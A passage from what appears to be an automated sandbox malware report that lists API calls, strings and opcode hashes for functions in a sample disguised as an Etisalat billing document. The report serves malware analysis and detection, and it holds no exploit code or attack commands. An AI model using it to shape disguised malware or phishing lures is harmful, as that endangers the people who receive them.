                                      • GetWindowRect.USER32(00000000,?), ref: 00BBC7D3
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00BBC827
                                      • GetDlgItem.USER32(?,000003E9), ref: 00BBC835
                                      • GetWindowRect.USER32(00000000,?), ref: 00BBC846
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00BBC889
                                      • GetDlgItem.USER32(?,000003EA), ref: 00BBC897
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BBC8B4
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00BBC8C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: f66d6e06ca6f7b0b52dfc6ad67b2f3dc7dccd593672515bfb7d76aa1a637d29f
                                      • Instruction ID: 98a4f9fac05463ecef05e8c10346d83262d8b7d6a9e5b858eb55b627a20eeb42
                                      • Opcode Fuzzy Hash: f66d6e06ca6f7b0b52dfc6ad67b2f3dc7dccd593672515bfb7d76aa1a637d29f
                                      • Instruction Fuzzy Hash: A5512071B00205AFDB18CF69DD99ABEBBBAEB88311F14816DF516D7290DBB09D00CB50
                                      Function 00B6201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B62036,?,00000000,?,?,?,?,00B616CB,00000000,?), ref: 00B61B9A
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B620D3
                                      • KillTimer.USER32(-00000001,?,?,?,?,00B616CB,00000000,?,?,00B61AE2,?,?), ref: 00B6216E
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00B9BEF6
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B616CB,00000000,?,?,00B61AE2,?,?), ref: 00B9BF27
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B616CB,00000000,?,?,00B61AE2,?,?), ref: 00B9BF3E
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B616CB,00000000,?,?,00B61AE2,?,?), ref: 00B9BF5A
                                      • DeleteObject.GDI32(00000000), ref: 00B9BF6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      • Opcode ID: 80de65a7c62b2b6316690ebac68f74e46bf3ab378d9bcc695a0b84d7e31dd382
                                      • Instruction ID: e900d19e9e47800393535f93a7ddef594a20fa51213cbbbba6268300a1ce44b0
                                      • Opcode Fuzzy Hash: 80de65a7c62b2b6316690ebac68f74e46bf3ab378d9bcc695a0b84d7e31dd382
                                      • Instruction Fuzzy Hash: 1161AC31504A51DFEB359F18EE88B29B7F1FF40312F1084A9E5429B9A1CB79A891DF60
                                      Function 00B621A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B625DB: GetWindowLongW.USER32(?,000000EB), ref: 00B625EC
                                      • GetSysColor.USER32(0000000F), ref: 00B621D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: cb764f9a3e4b4fedc3400256e35cbab502cd9f8dd478f5af838b3490b3e195d7
                                      • Instruction ID: b4a26df9a787b80d96ffdfc0bb753cb1cd267f0bcc8c19033a07ee6e0edbbe74
                                      • Opcode Fuzzy Hash: cb764f9a3e4b4fedc3400256e35cbab502cd9f8dd478f5af838b3490b3e195d7
                                      • Instruction Fuzzy Hash: 2241A1310019949FEF215F28EC98BB93BA5EB06331F1482A5FD659F1E2CB358D42DB21
                                      Function 00BCAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,00BEF910), ref: 00BCAB76
                                      • GetDriveTypeW.KERNEL32(00000061,00C1A620,00000061), ref: 00BCAC40
                                      • _wcscpy.LIBCMT ref: 00BCAC6A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2820617543-1000479233
                                      • Opcode ID: af8918bddad9f1c0e8520d52d235fba2eb04577cfbd461884550d328f17ed052
                                      • Instruction ID: b9c5d7450455b40a39997e3c8229d3b1343a82dcf1224ac9bbc8cab9ee7bae63
                                      • Opcode Fuzzy Hash: af8918bddad9f1c0e8520d52d235fba2eb04577cfbd461884550d328f17ed052
                                      • Instruction Fuzzy Hash: AC51A0312183059BC710EF14C891EAAB7E6EF85318F1448ADF4969B2A2DB31ED49CB53
                                      Function 00B69997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __i64tow__itow__swprintf
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 421087845-2263619337
                                      • Opcode ID: 9d824473767505d382829a4f30240a072299487c355464c6a62ac932c0658fe2
                                      • Instruction ID: 3695c18da267ac9e755a2618106e875edbd6cb44ddbe04e93fc18b0a47522398
                                      • Opcode Fuzzy Hash: 9d824473767505d382829a4f30240a072299487c355464c6a62ac932c0658fe2
                                      • Instruction Fuzzy Hash: 6B41D171604206AFDF24AB78DC82E7A73E8EB45320F2044FEE549D72A1EE75D941DB11
                                      Function 00BE73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BE73D9
                                      • CreateMenu.USER32 ref: 00BE73F4
                                      • SetMenu.USER32(?,00000000), ref: 00BE7403
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BE7490
                                      • IsMenu.USER32(?), ref: 00BE74A6
                                      • CreatePopupMenu.USER32 ref: 00BE74B0
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BE74DD
                                      • DrawMenuBar.USER32 ref: 00BE74E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                      • String ID: 0$F
                                      • API String ID: 176399719-3044882817
                                      • Opcode ID: 58a87151bf31cdb2b2fcde57f206f9f73e39cbc695f9d2c0685681f1e0da4f25
                                      • Instruction ID: 072832ddde2a83900d475f1c2a01597249f19d91e6d940340d424b9e8464d052
                                      • Opcode Fuzzy Hash: 58a87151bf31cdb2b2fcde57f206f9f73e39cbc695f9d2c0685681f1e0da4f25
                                      • Instruction Fuzzy Hash: 55415875A00286EFDB20DF65D884BAABBF5FF59300F144068E955973A0DB31A910DFA0
                                      Function 00BE772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BE77CD
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00BE77D4
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BE77E7
                                      • SelectObject.GDI32(00000000,00000000), ref: 00BE77EF
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BE77FA
                                      • DeleteDC.GDI32(00000000), ref: 00BE7803
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00BE780D
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BE7821
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BE782D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: 79e5fea54c6463c5d4200033392296bb976c7fabbebcd8627e7ca96b32b48373
                                      • Instruction ID: 2681c1c5a20e66b6d8dca45fc151e7fb05ebb0ec67a7f99cfed3da3649ad5b1e
                                      • Opcode Fuzzy Hash: 79e5fea54c6463c5d4200033392296bb976c7fabbebcd8627e7ca96b32b48373
                                      • Instruction Fuzzy Hash: F3319E31105196BBDF119F76DC49FEB3BA9FF09321F110264FA15A61A0CB31D821DBA4
                                      Function 00B87040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00B8707B
                                        • Part of subcall function 00B88D68: __getptd_noexit.LIBCMT ref: 00B88D68
                                      • __gmtime64_s.LIBCMT ref: 00B87114
                                      • __gmtime64_s.LIBCMT ref: 00B8714A
                                      • __gmtime64_s.LIBCMT ref: 00B87167
                                      • __allrem.LIBCMT ref: 00B871BD
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B871D9
                                      • __allrem.LIBCMT ref: 00B871F0
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B8720E
                                      • __allrem.LIBCMT ref: 00B87225
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B87243
                                      • __invoke_watson.LIBCMT ref: 00B872B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                      • String ID:
                                      • API String ID: 384356119-0
                                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                      • Instruction ID: 32d6c56768504e14e7ef0527d3e35f13d3244271a2ce3984ceb41c3c60744ca5
                                      • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                      • Instruction Fuzzy Hash: 4971D771A44716ABDB14FE79CC81B5AB3E8EF11728F2442BAF414E6691EB70D940C790
                                      Function 00BC2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2A31
                                      • GetMenuItemInfoW.USER32(00C26890,000000FF,00000000,00000030), ref: 00BC2A92
                                      • SetMenuItemInfoW.USER32(00C26890,00000004,00000000,00000030), ref: 00BC2AC8
                                      • Sleep.KERNEL32(000001F4), ref: 00BC2ADA
                                      • GetMenuItemCount.USER32(?), ref: 00BC2B1E
                                      • GetMenuItemID.USER32(?,00000000), ref: 00BC2B3A
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00BC2B64
                                      • GetMenuItemID.USER32(?,?), ref: 00BC2BA9
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BC2BEF
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BC2C03
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BC2C24
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                      • String ID:
                                      • API String ID: 4176008265-0
                                      • Opcode ID: 6247ed2124e5fc5cd0f16958b375a8966636a9bd44537ba614596d9ef90cc7bc
                                      • Instruction ID: a1b8ad7b58fd8ccf08576d8a8bb69dd74dcf64dc786d006f866a2454cffc2aed
                                      • Opcode Fuzzy Hash: 6247ed2124e5fc5cd0f16958b375a8966636a9bd44537ba614596d9ef90cc7bc
                                      • Instruction Fuzzy Hash: 3C6169B090028AAFDB21CF64D888FBFBBF8EB55304F1445ADE841A7251DB31AD45DB21
                                      Function 00BE7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BE7214
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BE7217
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BE723B
                                      • _memset.LIBCMT ref: 00BE724C
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BE725E
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BE72D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow_memset
                                      • String ID:
                                      • API String ID: 830647256-0
                                      • Opcode ID: 4079db4333ea933add37f433ab8921362751b513b7c677d12b0d0a8e62fd5a35
                                      • Instruction ID: 319ac63e92aa09d5fe7334a4f5d8eaee7a5634e3969714c6f02b3fe5fa1e30dc
                                      • Opcode Fuzzy Hash: 4079db4333ea933add37f433ab8921362751b513b7c677d12b0d0a8e62fd5a35
                                      • Instruction Fuzzy Hash: 74616D75940288AFDB20DFA4CC81EEE77F8EB09710F140199FA14E72A1DB70AD46DB64
                                      Function 00BB710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BB7135
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00BB718E
                                      • VariantInit.OLEAUT32(?), ref: 00BB71A0
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BB71C0
                                      • VariantCopy.OLEAUT32(?,?), ref: 00BB7213
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BB7227
                                      • VariantClear.OLEAUT32(?), ref: 00BB723C
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00BB7249
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BB7252
                                      • VariantClear.OLEAUT32(?), ref: 00BB7264
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BB726F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: e2ff6e242be648c089797dd8b24ef74454713141be529bd9a4674ddab432366e
                                      • Instruction ID: 3a32a9c7c698b2b28ad5b8bfc304628c1b06a8d1e9f0ff8276f25919037d9368
                                      • Opcode Fuzzy Hash: e2ff6e242be648c089797dd8b24ef74454713141be529bd9a4674ddab432366e
                                      • Instruction Fuzzy Hash: B8411D35904119AFCF009FA8D884DFEBBF9EF48354B0080A9E955AB361CB74A945CB90
                                      Function 00BD5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00BD5AA6
                                      • inet_addr.WSOCK32(?,?,?), ref: 00BD5AEB
                                      • gethostbyname.WSOCK32(?), ref: 00BD5AF7
                                      • IcmpCreateFile.IPHLPAPI ref: 00BD5B05
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BD5B75
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BD5B8B
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BD5C00
                                      • WSACleanup.WSOCK32 ref: 00BD5C06
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: 498603ff3c04d45099bc6cbb9b330c897a58176fc33e84075cd541d46a7fbbe9
                                      • Instruction ID: cdb605d429ab5fda7d34273e4ff32c619d0e8d224ca8b4aeb49c679e495bb55a
                                      • Opcode Fuzzy Hash: 498603ff3c04d45099bc6cbb9b330c897a58176fc33e84075cd541d46a7fbbe9
                                      • Instruction Fuzzy Hash: B9515D316047019FDB20AF24CC85B2AB7E4EF48710F1489ABF556DB2A1EB74ED40CB56
                                      Function 00BCB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00BCB73B
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BCB7B1
                                      • GetLastError.KERNEL32 ref: 00BCB7BB
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00BCB828
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: f214cba399459fb338ae7d2a3b77c22032de7763f7b72099bc2881795ca83244
                                      • Instruction ID: fb329e3ec71ec6089da2450b8e5f35d6f7fc51cc53d06162df78815ce3ce07ea
                                      • Opcode Fuzzy Hash: f214cba399459fb338ae7d2a3b77c22032de7763f7b72099bc2881795ca83244
                                      • Instruction Fuzzy Hash: BF316035A002099FDB10EF68D886FBE7BF8EF85710F1480AAE906DB291DB759D42C751
                                      Function 00BB9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00BB94F6
                                      • GetDlgCtrlID.USER32 ref: 00BB9501
                                      • GetParent.USER32 ref: 00BB951D
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BB9520
                                      • GetDlgCtrlID.USER32(?), ref: 00BB9529
                                      • GetParent.USER32(?), ref: 00BB9545
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BB9548
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
